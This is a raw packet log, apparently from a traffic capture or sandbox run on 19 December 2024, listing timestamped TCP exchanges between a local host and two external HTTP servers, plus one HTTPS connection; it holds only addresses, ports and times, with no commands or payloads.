Dec 19, 2024 10:10:35.873476982 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.873512030 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.874268055 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.874322891 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.874619007 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.874665976 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.875108004 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.875166893 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.875534058 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.875721931 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.876070976 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.876415014 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.876425982 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.876570940 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.876944065 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.877075911 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.877130985 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.877846003 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.877995014 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.878181934 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.878681898 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.878735065 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.878748894 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.879569054 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.879621029 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.879683971 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.880044937 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.880434990 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.880491972 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.880637884 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.880731106 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.881376982 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.881426096 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.881491899 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.881623983 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.882268906 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.882317066 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.882371902 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.882438898 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.883294106 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.883348942 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.883399963 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.884020090 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.884341955 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.884347916 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.884392977 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.884944916 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.885024071 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.885070086 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.885833025 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.885893106 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.885974884 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.886164904 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.886775970 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.886825085 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.886868000 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.886919975 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.930356026 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.930444956 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.930445910 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.930664062 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.930717945 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.930999994 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.931495905 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.931552887 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.931998014 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.932240009 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.932275057 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.932286024 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.932313919 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.933166027 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.933348894 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.933398962 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.933928013 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.933990002 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.934412956 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.934709072 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.934988976 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.935045004 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.935381889 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.935730934 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.935787916 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.935868979 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.936629057 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.936691046 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.936857939 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.937616110 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.937675953 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.937884092 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.937994957 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.938427925 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.938613892 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.938667059 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.939286947 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.939590931 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.939640999 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.940256119 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.940577030 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.940615892 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.940668106 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.941312075 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.941555023 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.941586018 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.941600084 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.942157030 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.942423105 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.942471027 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.943053007 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.943087101 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.943135977 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.943893909 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.943945885 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.943964005 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.944691896 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.944735050 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.945018053 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.945554018 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.945605993 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.945768118 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.945997953 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.946429014 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.946511984 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.946592093 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.947393894 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.947455883 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:35.947861910 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:35.948102951 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:36.897861004 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.897927046 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.897957087 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.897963047 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.898041964 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.898042917 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.898097992 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.898133039 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.898165941 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.898169041 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.898195982 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.898205996 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.898215055 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.898248911 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.898955107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.898989916 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.899020910 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.899028063 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:36.899041891 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:36.899085045 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.028033018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.028100014 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.028162003 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.028162003 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.091351032 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.091420889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.091470003 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.091521978 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.096354961 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.096441984 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.096503019 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.102871895 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.102926016 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.102942944 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.102977991 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.110629082 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.110668898 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.110727072 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.118313074 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.118393898 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.118412018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.118508101 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.126651049 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.126741886 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.127022028 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.134885073 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.134963989 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.135027885 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.135082960 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.143073082 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.143140078 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.143147945 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.143269062 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.150859118 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.151000977 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.151015997 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.151264906 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.159305096 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.159390926 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.159450054 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.159503937 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.167646885 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.167735100 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.263906002 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.264015913 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.264031887 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.264291048 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.268132925 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.268223047 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.281929970 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.282049894 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.282058001 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.282145023 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.284100056 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.284177065 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.284229994 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.284341097 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.288578987 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.288656950 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.288659096 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.288763046 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.292649984 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.292706013 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.292732000 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.292754889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.297185898 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.297303915 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.297319889 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.297842026 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.301449060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.301521063 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.301539898 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.301634073 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.305802107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.305855036 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.305974007 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.306132078 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.310220003 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.310275078 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.310321093 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.310394049 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.314594984 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.314672947 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.314696074 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.314887047 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.319356918 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.319415092 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.319487095 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.319552898 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.323782921 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.323842049 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.323925972 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.323987961 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.327925920 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.327982903 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.328012943 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.328051090 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.332361937 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.332418919 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.332488060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.332659960 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.337317944 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.337400913 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.337449074 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.337517023 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.341130018 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.341229916 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.341234922 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.341283083 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.345290899 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.345360041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.345418930 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.345477104 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.349561930 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.349611998 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.349639893 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.349670887 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.354106903 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.354191065 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.354235888 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.354300022 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.384149075 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.384238958 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.384272099 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.384365082 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.386646986 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.386732101 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.386818886 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.387015104 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.390436888 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.390494108 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.456130028 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.456171036 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.456270933 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.457976103 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.458039045 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.458144903 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.458576918 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.461950064 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.462030888 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.474415064 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.474473953 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.474489927 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.474628925 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.476119995 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.476253986 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.476267099 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.476320028 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.480201960 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.480288982 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.480374098 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.480427980 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.483599901 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.483695984 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.483716965 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.483786106 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.484497070 CET	49936	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.484559059 CET	443	49936	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:37.484740973 CET	49936	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.485302925 CET	49936	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.485359907 CET	443	49936	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:37.487333059 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.487436056 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.487483025 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.487514973 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.490526915 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.490586042 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.490672112 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.490736008 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.493706942 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.493823051 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.493837118 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.493880987 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.497529984 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.497602940 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.497601986 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.497657061 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.500967026 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.501077890 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.501080990 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.501183987 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.504561901 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.504661083 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.504688978 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.504774094 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.508172035 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.508394003 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.508614063 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.508837938 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.511075974 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.511153936 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.511248112 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.511329889 CET	49928	80	192.168.2.6	185.215.113.16
